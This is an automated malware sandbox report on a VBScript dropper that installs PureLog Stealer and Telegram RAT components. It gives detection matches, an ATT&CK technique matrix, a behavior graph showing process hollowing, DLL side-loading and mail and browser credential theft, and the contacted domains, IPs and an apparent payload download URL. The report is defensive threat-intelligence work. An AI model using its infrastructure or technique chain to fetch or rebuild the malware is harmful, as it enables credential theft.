            Source: Yara matchFile source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		1
            Valid Accounts            		1
            Windows Management Instrumentation            		121
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Valid Accounts            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            System Network Connections Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Shared Modules            		1
            Valid Accounts            		1
            Access Token Manipulation            		4
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Exploitation for Client Execution            		1
            Registry Run Keys / Startup Folder            		311
            Process Injection            		2
            Software Packing            		NTDS36
            System Information Discovery            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts12
            Command and Scripting Interpreter            		Network Logon Script1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		LSA Secrets1
            Query Registry            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials251
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            File Deletion            		DCSync2
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
            Masquerading            		Proc Filesystem2
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Valid Accounts            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Modify Registry            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Access Token Manipulation            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
            Virtualization/Sandbox Evasion            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
            Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers311
            Process Injection            		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592501 Sample: INQUIRY LIST 292.vbs Startdate: 16/01/2025 Architecture: WINDOWS Score: 100 61 reallyfreegeoip.org 2->61 63 www.volareconsultoria.com.br 2->63 65 3 other IPs or domains 2->65 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus / Scanner detection for submitted sample 2->77 81 15 other signatures 2->81 10 wscript.exe 2 2->10         started        14 Uhzauuil.PIF 2->14         started        16 Uhzauuil.PIF 2->16         started        signatures3 79 Tries to detect the country of the analysis system (by using the IP) 61->79 process4 file5 59 C:\Users\user\AppData\Local\Temp\x.exe, PE32 10->59 dropped 97 Benign windows process drops PE files 10->97 99 VBScript performs obfuscated calls to suspicious functions 10->99 101 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->101 18 x.exe 1 10 10->18         started        103 Antivirus detection for dropped file 14->103 105 Multi AV Scanner detection for dropped file 14->105 107 Writes to foreign memory regions 14->107 23 liuuazhU.pif 2 14->23         started        109 Allocates memory in foreign processes 16->109 111 Sample uses process hollowing technique 16->111 25 liuuazhU.pif 16->25         started        signatures6 process7 dnsIp8 67 volareconsultoria.com.br 50.116.86.44, 443, 49730, 49731 UNIFIEDLAYER-AS-1US United States 18->67 51 C:\Windows \SysWOW6451ETUTILS.dll, PE32+ 18->51 dropped 53 C:\Users\Public\Libraries\liuuazhU.pif, PE32 18->53 dropped 55 C:\Users\Public\Libraries\Uhzauuil.PIF, PE32 18->55 dropped 57 3 other files (2 malicious) 18->57 dropped 83 Antivirus detection for dropped file 18->83 85 Multi AV Scanner detection for dropped file 18->85 87 Drops PE files with a suspicious file extension 18->87 95 4 other signatures 18->95 27 liuuazhU.pif 15 2 18->27         started        31 cmd.exe 3 18->31         started        33 cmd.exe 1 18->33         started        35 reg.exe 23->35         started        89 Tries to steal Mail credentials (via file / registry access) 25->89 91 Uses cmd line tools excessively to alter registry or file data 25->91 93 Tries to harvest and steal browser information (history, passwords, etc) 25->93 37 reg.exe 25->37         started        file9 signatures10 process11 dnsIp12 69 checkip.dyndns.com 193.122.6.168, 49732, 49740, 49742 ORACLE-BMC-31898US United States 27->69 71 reallyfreegeoip.org 104.21.96.1, 443, 49733, 49741 CLOUDFLARENETUS United States 27->71 113 Detected unpacking (changes PE section rights) 27->113 115 Detected unpacking (overwrites its own PE header) 27->115 117 Tries to steal Mail credentials (via file / registry access) 27->117 119 Uses cmd line tools excessively to alter registry or file data 27->119 39 reg.exe 1 27->39         started        41 conhost.exe 31->41         started        43 conhost.exe 33->43         started        45 conhost.exe 35->45         started        47 conhost.exe 37->47         started        signatures13 process14 process15 49 conhost.exe 39->49         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            INQUIRY LIST 292.vbs32%ReversingLabsScript-WScript.Trojan.Valyria
            INQUIRY LIST 292.vbs100%AviraVBS/Drop.Agent.VPYN

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\Libraries\Uhzauuil.PIF100%AviraHEUR/AGEN.1325914
            C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1325914
            C:\Windows \SysWOW64\NETUTILS.dll100%Joe Sandbox ML
            C:\Users\Public\Libraries\Uhzauuil.PIF42%ReversingLabsWin32.Trojan.Generic
            C:\Users\Public\Libraries\liuuazhU.pif3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\x.exe42%ReversingLabsWin32.Trojan.Generic
            C:\Windows \SysWOW64\NETUTILS.dll61%ReversingLabsWin64.Trojan.Barys
            C:\Windows \SysWOW64\svchost.pif0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.volareconsultoria.com.br/u0%Avira URL Cloudsafe
            https://www.volareconsultoria.com.br/245_Uhzauuilkul0%Avira URL Cloudsafe
            https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluo0%Avira URL Cloudsafe
            https://reallyfreegeoip.orgfl0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            volareconsultoria.com.br
            		50.116.86.44
            		truetrue
              		unknown
              reallyfreegeoip.org
              		104.21.96.1
              		truefalse
                		high
                checkip.dyndns.com
                		193.122.6.168
                		truefalse
                  		high
                  checkip.dyndns.org
                  		unknown
                  		unknownfalse
                    		high
                    www.volareconsultoria.com.br
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        		high
                        https://www.volareconsultoria.com.br/245_Uhzauuilkultrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://www.volareconsultoria.com.br/ux.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://sectigo.com/CPS0x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.sectigo.com0x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botliuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluox.exe, 00000001.00000002.1855286953.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://checkip.dyndns.orgliuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.org/hliuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://reallyfreegeoip.org/xml/8.46.123.189lliuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://reallyfreegeoip.orgflliuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://checkip.dyndns.org/pliuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://reallyfreegeoip.orgliuuazhU.pif, 00000006.00000002.3109531523.000000001D531000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADD6000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.orgliuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.comliuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameliuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.sectigo.com0Cx.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndnliuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.pmail.com0x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.drfalse
                                                              		high
                                                              https://reallyfreegeoip.org/xml/liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                193.122.6.168
                                                                		checkip.dyndns.comUnited States
                                                                		31898ORACLE-BMC-31898USfalse
                                                                104.21.96.1
                                                                		reallyfreegeoip.orgUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                50.116.86.44
                                                                		volareconsultoria.com.brUnited States
                                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1592501
                                                                Start date and time:2025-01-16 08:28:08 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 58s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:21
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
